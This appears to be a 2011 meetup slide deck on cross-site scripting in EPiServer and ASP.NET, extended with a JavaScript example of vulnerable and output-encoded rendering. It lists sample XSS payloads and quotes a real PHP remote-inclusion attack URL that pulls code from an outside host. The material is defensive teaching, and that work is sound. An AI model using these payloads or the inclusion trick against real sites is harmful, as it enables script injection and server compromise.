XSS - Presented at EPiServer Meetup in Oslo 25th May 2011
  1. XSS – Cross site scripting
     Oslo EPiServer Meetup #7 – 25th May 2011
     © Creuna

  2. Definition
     Cross site scripting is a form of attack where the attacker is able to run arbitrary JavaScript code in a web page viewed by another user.
     XSS compromises the client side, not the server.
     But depending on the nature of the website it can be a serious security risk.

  3. Consequences
     XSS may be used to
      - steal session cookies
      - perform any action that the attacked user has rights to do, maybe even without him knowing
      - display false or modified content
     XSS attacks may spread like a software worm, for instance on a social network site: a user posts the attacking code, which infects his friends, they post it, and so on.

  4. Two types of XSS
     Non persistent (reflected):
     A user follows a malicious link or form from a dangerous website, email, etc. The vulnerable website writes the XSS attack into the response, and only this user is affected.
     Persistent (stored):
     The XSS attack code is stored on the vulnerable web site, for instance in a user comment. All subsequent users of the web site may be exposed to the XSS attack.

  5. Where does the XSS attack come from?
     All content from insecure sources is potentially dangerous:
      - form submissions
      - URLs
      - all other sources: RSS feeds, integrated systems, etc.
  6. Form submissions
     Dangerous content may come through POST variables.
     Remember that POST requests do not necessarily originate from a form on a page you served the user; an attacker may craft a web page or request targeting your web site.
     DEMO
     (The demo showed a simple ASP.NET form writing a submitted text back to the page on postback. By default, dangerous POST variables make ASP.NET's request validation throw an exception, so we are covered, right? The next demo showed the same principle in a minimally modified EPiServer demo site, and the XSS attack was successful: EPiServer turns off ASP.NET's request validation in its default configuration.)

  7. Url input
     Do you write the value of Request.Url back to your response?
     Yes, even ASP.NET itself does that.
     DEMO
     (The demo showed a URL with XSS in it against a standard ASP.NET web site, and we got an exception as with the POST attack. EPiServer proved vulnerable again.)

  8. EPiServer
     ASP.NET is normally well secured against XSS.
     But EPiServer turns this feature off by default.
     We must always give external input an extra thought in EPiServer: ASP.NET's normal safety net is turned off!

  9. How do we secure ourselves against XSS?
     Always make sure to escape data from unsecure sources if you are going to write it to the response. Encode for the context you write into (HTML text, attribute value, URL), and do it at output time, so stored content is encoded on every render.
     This also applies to URLs, like Request.Url.
     Do not trust your own ability to foresee all scenarios, so do not write the code for this yourself.
     Use a well tested and reviewed framework.
     For instance Microsoft's AntiXSS: http://wpl.codeplex.com/
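The demos on slides 6, 7 and 9 were shown live and are not included in the deck. The following is an added example, not code from the slides, from EPiServer or from Microsoft's AntiXSS library: it uses JavaScript (runs under Node) to show the same "echo the submitted text / the request URL back into the page" pattern in a vulnerable and a hardened form. The encoder functions, their names and the sample payloads are our own and hypothetical; a real project should use a reviewed library, as slide 9 says.

```javascript
// Added example (not from the slides, not the AntiXSS API):
// minimal context-aware output encoders plus a vulnerable and a hardened
// version of "write the input / Request.Url back to the response".

// Encode for an HTML text node or a double-quoted attribute value.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// For href/src: allow only absolute http(s) URLs, then HTML-encode.
// Anything else (javascript:, data:, attribute break-outs) becomes "#".
function safeHref(s) {
  const v = String(s).trim();
  return /^https?:\/\/[^\s"'<>]+$/i.test(v) ? encodeHtml(v) : '#';
}

// Slide 6 demo, vulnerable: the submitted text is written straight into the response.
function renderVulnerable(input) {
  return `<p>You wrote: ${input}</p>`;
}

// Same page, hardened: encode for the HTML text context it lands in.
function renderSafe(input) {
  return `<p>You wrote: ${encodeHtml(input)}</p>`;
}

// Slide 7 demo: the request URL echoed into a link, vulnerable and hardened.
function renderUrlVulnerable(url) {
  return `<a href="${url}">${url}</a>`;
}
function renderUrlSafe(url) {
  return `<a href="${safeHref(url)}">${encodeHtml(url)}</a>`;
}

// Constructed sample inputs (not from the slides), one per injection context.
const samplePayloads = {
  body: '<script>alert(1)</script>',          // breaks out of a text node
  attr: '" onmouseover="alert(1)',             // breaks out of an attribute value
  scheme: 'javascript:alert(1)',               // abuses the URL scheme in href
  benign: 'http://example.com/page?a=1&b=2',   // legitimate value that must survive
};

// Render every payload both ways so the difference can be inspected or asserted.
function demo() {
  const out = {};
  for (const [name, p] of Object.entries(samplePayloads)) {
    out[name] = {
      vulnerable: renderVulnerable(p),
      safe: renderSafe(p),
      urlVulnerable: renderUrlVulnerable(p),
      urlSafe: renderUrlSafe(p),
    };
  }
  return out;
}

console.log(JSON.stringify(demo(), null, 2));
```

Note that the encoding is applied where the value is written, not where it is received: that is what makes the hardened version hold for the persistent case on slide 4 as well, since a stored comment is encoded on every render. Request validation (the safety net slides 6 to 8 say EPiServer disables) rejects some inputs up front; output encoding is what actually makes the page safe whether or not that net is in place.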
  10. Are you using PHP?
      As PHP is a script language, similar attacks may actually compromise the server side.
      Real world example from one of our projects:
      <form method="post" action="/no/?_SERVER%25255bDOCUMENT_ROOT%25255d=http://bungalowsdemo.info/images/test.gif" id="aspnetForm">
      This attack would make the server run the PHP code in test.gif, which is not a picture but PHP code.
      The website bungalowsdemo.info is probably unknowingly attacked and used to host the attack code.
      (Overwriting $_SERVER['DOCUMENT_ROOT'] from the query string like this only works on PHP configured with register_globals, against a script that builds an include path from that value, and pulling the include from another host requires remote includes to be allowed; the fix is to turn those off and never build include paths from request data.)

  11. External script files
      Do you include external script files in your web site?
      For instance, do you use Google's or Microsoft's CDN for JavaScript?
      Real world example, web statistics tool:
      <script src="http://res.xtractor.no/x.js" type="text/javascript"></script>

  12. External script files
      If you reference external script files you give another domain/source the right to run JavaScript on your web site.
      Of course you can trust Google's or Microsoft's CDN to deliver proper code.
      But a different domain may be vulnerable to DNS attacks.
      An attacker may manipulate DNS on the local machine or network to deliver external scripts from a different source.
      If all referenced script files are from the same domain as the viewed web page, you avoid this vulnerability.

  13. Questions?